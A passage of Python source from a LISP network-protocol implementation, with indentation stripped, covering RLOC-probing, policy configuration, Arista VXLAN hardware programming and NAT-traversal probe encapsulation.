lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for becomes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_multicast_rloc
#
# Time-out member RLOCs for this multicast RLOC. Check if an RLOC-probe reply
# has been received within the timeout interval.
#
def lisp_process_multicast_rloc(multicast_rloc):
maddr = multicast_rloc.rloc.print_address_no_iid()
now = lisp_get_timestamp()
for addr in multicast_rloc.multicast_rloc_probe_list:
mrloc = multicast_rloc.multicast_rloc_probe_list[addr]
if (mrloc.last_rloc_probe_reply + LISP_RLOC_PROBE_REPLY_WAIT >= now):
continue
#endif
if (mrloc.state == LISP_RLOC_UNREACH_STATE): continue
#
# It went down.
#
mrloc.state = LISP_RLOC_UNREACH_STATE
mrloc.last_state_change = lisp_get_timestamp()
lprint("Multicast-RLOC {} member-RLOC {} went unreachable".format( \
maddr, red(addr, False)))
#endfor
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probing
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in list(lisp_rloc_probe_list.values()):
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but different translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending an RLOC-probe if we just received a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install a host
# route to the RLOC so we can direct the RLOC-probe out an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr = red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# This might be the first time and other RLOCs on the chain may not
# have an RLOC address. Copy it now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Time-out member RLOCs for multicast RLOC probing.
#
if (rloc.multicast_rloc_probe_list != {}):
lisp_process_multicast_rloc(rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reinstall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# unconditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if the RTR address is in the RTR-list the lisp-itr process learned
# from the map-server.
#
if (rtr_str not in lisp_rtr_list): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc, rloc_name):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (map_reply_addr not in mrloc.multicast_rloc_probe_list):
nrloc = lisp_rloc()
nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.rloc_name = rloc_name
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (addr not in pl):
addr += ":" + str(port)
if (addr not in pl):
addr = source_addr
if (addr not in pl):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endfor
return(count)
#enddef
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
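#
# Illustrative example (made-up MAC strings):
#
#   >>> lisp_format_macs("0050b6a57f10", "00a0c912e3f4")
#   '0050-b6a5-7f10 -> 00a0-c912-e3f4'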
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (rloc_str in lisp_nonce_echo_list):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name and the new position in the packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = b""
while(packet[0:1] != b"\x00"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name.decode())
#enddef
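#
# Illustrative example (made-up record contents): if the packet starts with
# the bytes b"jtag-xtr\x00" followed by the rest of the record, the function
# returns the packet positioned after the NULL byte and the string
# "jtag-xtr". A name of 255 bytes or more with no NULL returns [None, None].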
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of flow entries, where the last
# element of each entry is a lisp_packet. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in list(kv_pair.keys()):
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
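#
# Illustrative example (hypothetical command): calling
# lisp_send_to_arista("vxlan flood vtep add 17.17.17.17", "Vxlan1") logs
# "Send CLI command 'interface Vxlan1: vxlan flood vtep add 17.17.17.17' to
# hardware" and runs FastCli with an enable/configure preamble followed by
# the "interface Vxlan1" line and the command itself.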
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address and associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configured with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
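#
# Illustrative example of the derivation above (hypothetical addresses): for
# VTEP RLOC 10.17.34.51 the derived MAC is 00:00:00:11:22:33 (hex of the
# last three octets), the ARP entry binds the chosen vlan4094 next-hop to
# that MAC, and the Arista MAC-table entry points 0000.0011.2233 at VTEP
# 10.17.34.51.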
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data-encapsulate it with a source port of 4341
# and a destination address and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface name and next-hop of each IPv4 default route in an array
# and return it to the caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
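#
# Illustrative example (hypothetical routing table): if "ip route" prints
# "default via 192.168.1.1 dev eth0" and "default via 10.0.0.1 dev eth1",
# this function returns [["eth0", "192.168.1.1"], ["eth1", "10.0.0.1"]].
# Default routes carrying a "metric" keyword are skipped.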
#
# lisp_get_host_route_next_hop
#
